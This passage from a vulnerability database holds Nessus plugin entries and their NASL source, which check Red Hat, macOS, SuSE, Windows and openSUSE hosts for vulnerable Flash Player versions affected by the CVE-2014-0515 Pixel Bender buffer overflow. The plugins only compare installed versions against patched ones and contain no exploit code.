audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0447\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.356-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.356-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:23", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.275 / 11.8.x / 11.9.x / 12.x / 13.0.0.201. It is, therefore, potentially affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.275 / 13.0.0.201 Pixel Bender Component Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_13_0_0_206.NASL", "href": "https://www.tenable.com/plugins/nessus/73741", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73741);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.275 / 13.0.0.201 Pixel Bender Component Buffer Overflow (APSB14-13)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.275 / 11.8.x /\n11.9.x / 12.x / 13.0.0.201. It is, therefore, potentially affected by\na buffer overflow vulnerability due to improper user input validation\nin the Pixel Bender component. An attacker could cause a buffer\noverflow with a specially crafted SWF file, resulting in arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.279 / 13.0.0.206 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.275\";\nextended_fixed_version = \"11.7.700.279\";\n\nstandard_cutoff_version = \"13.0.0.201\";\nstandard_fixed_version = \"13.0.0.206\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\" || version =~ \"^12\\.\")\n fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^13\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:17:04", "description": "This flash-player update to version 11.2.202.356 fixes the following critical security issue :\n\n - buffer overflow vulnerability that leads to arbitrary code execution (CVE-2014-0515) Adobe Security Bulletin (APSB14-13) http://helpx.adobe.com/security/products/flash-player/ap sb14-13.html. (bnc#875577)", "cvss3": {}, "published": "2014-05-03T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9180)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140429.NASL", "href": "https://www.tenable.com/plugins/nessus/73850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73850);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0515\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update to version 11.2.202.356 fixes the following\ncritical security issue :\n\n - buffer overflow vulnerability that leads to arbitrary\n code execution (CVE-2014-0515) Adobe Security Bulletin\n (APSB14-13)\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-13.html. (bnc#875577)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=875577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0515.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.356-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.356-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:32", "description": "Versions of Adobe Flash player prior to 11.7.700.279 / 13.0.0.206 are outdated and thus unpatched for an overflow condition in the pixel bender component. The issue is triggered as user-supplied input is not properly validated. With a specially crafted SWF file, a context-dependent attacker can cause a buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. (CVE-2014-0515)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.279 / 13.0.0.206 Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8805.PRM", "href": "https://www.tenable.com/plugins/nnm/8805", "sourceData": "Binary data 8805.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:14", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.275 / 11.8.x / 11.9.x / 12.x / 13.0.0.182. It is, therefore, potentially affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.275 / 13.0.0.182 Pixel Bender Component Buffer Overflow (APSB14-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-13.NASL", "href": "https://www.tenable.com/plugins/nessus/73740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73740);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n\n script_name(english:\"Flash Player <= 11.7.700.275 / 13.0.0.182 Pixel Bender Component Buffer Overflow (APSB14-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.275 / 11.8.x /\n11.9.x / 12.x / 13.0.0.182. It is, therefore, potentially affected by\na buffer overflow vulnerability due to improper user input validation\nin the Pixel Bender component. An attacker could cause a buffer\noverflow with a specially crafted SWF file, resulting in arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.279 / 13.0.0.206 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 13.0.0.182\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 13 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 182)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.275\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 275)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n # 12.x\n (iver[0] == 12) ||\n\n # 13.0.0.x <= 13.0.0.182\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 182\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 13.0.0.206 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.279\";\n else\n fix = \"13.0.0.206\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:50", "description": "This flash-player update fixes a critical buffer overflow vulnerability that leads to arbitrary code execution.\n\nThe flash-player package was updated to version 11.2.202.356.\n\n - bnc#875577, APSB14-13, CVE-2014-0515", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0585-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-322.NASL", "href": "https://www.tenable.com/plugins/nessus/75334", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-322.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75334);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0515\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0585-1)\");\n script_summary(english:\"Check for the openSUSE-2014-322 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update fixes a critical buffer overflow\nvulnerability that leads to arbitrary code execution.\n\nThe flash-player package was updated to version 11.2.202.356.\n\n - bnc#875577, APSB14-13, CVE-2014-0515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=875577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00065.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.356-2.72.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.356-46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.356-46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.356-46.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:09:14", "description": "The remote host is missing KB2961887. It is, therefore, affected by a buffer overflow vulnerability due to improper user input validation in the Pixel Bender component. An attacker could cause a buffer overflow with a specially crafted SWF file, resulting in arbitrary code execution.", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "nessus", "title": "MS KB2961887: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2961887.NASL", "href": "https://www.tenable.com/plugins/nessus/73742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73742);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_xref(name:\"MSKB\", value:\"2961887\");\n\n script_name(english:\"MS KB2961887: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2961887. It is, therefore, affected by a\nbuffer overflow vulnerability due to improper user input validation in\nthe Pixel Bender component. An attacker could cause a buffer overflow\nwith a specially crafted SWF file, resulting in arbitrary code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2961887/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n # https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5043fc7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2961887.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/28\");\n 